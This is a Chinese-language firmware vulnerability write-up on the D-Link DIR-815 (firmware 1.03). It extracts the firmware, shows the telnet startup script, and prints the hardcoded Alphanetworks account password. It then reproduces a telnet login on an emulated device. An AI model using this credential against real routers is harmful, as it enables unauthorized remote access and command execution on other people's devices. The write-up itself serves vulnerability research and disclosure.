D-Link DIR-815 泄露密码漏洞

漏洞介绍

在D-Link DIR-815中,存在固定账户密码,攻击者可以通过分析固件或者账户密码,能登录telnet服务,进一步执行任意的系统命令

漏洞分析

首先下载DIR-815的1.03版本的固件,然后提取文件系统

1
binwalk -Me  DIR815A1_FW103b01.bin

解压固件后,使用firmwalker执行如下命令来收集文件系统的信息

1
./firmwalker.sh    ~/Desktop/D-Link/_DIR815A1_FW103b01.bin.extracted/squashfs-root/

收集的信息默认在firmwalker.txt,打开firmwalker.txt,可以看到很多sh脚本,重点关注

/etc/init0.d/S80telnetd.sh

分析一下/etc/init0.d/S80telnetd.sh,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
iot@research:~/Desktop/D-Link/_DIR815A1_FW103b01.bin.extracted/squashfs-root/etc/init0.d$ cat S80telnetd.sh 
#!/bin/sh
echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
	if [ -f "/usr/sbin/login" ]; then
		image_sign=`cat /etc/config/image_sign`
		telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
	else
		telnetd &
	fi
else
	killall telnetd
fi

可以看到/etc/config/image_sign的数据成了Alphanetworks账户的密码,并启动了telnet服务,于是打开image_sign

1
2
3
iot@research:~/Desktop/D-Link/_DIR815A1_FW103b01.bin.extracted/squashfs-root/etc/init0.d$ cat ../../etc/config/image_sign
wrgnd08_dlob_dir815

得到账户/密码 = Alphanetworks/wrgnd08_dlob_dir815

漏洞复现

DIR的直接使用FirmAE模拟即可

1
iot@research:~/tools/FirmAE$ sudo ./run.sh  -r DIR815  ~/Desktop/D-Link/DIR815A1_FW103b01.bin

![image-20240813171730166](/picture/D-Link DIR-815 后门漏洞/image-20240813171730166.png)

成功模拟,然后使用telnet登录

1
telnet 192.168.0.1

![image-20240813172100456](/picture/D-Link DIR-815 后门漏洞/image-20240813172100456.png)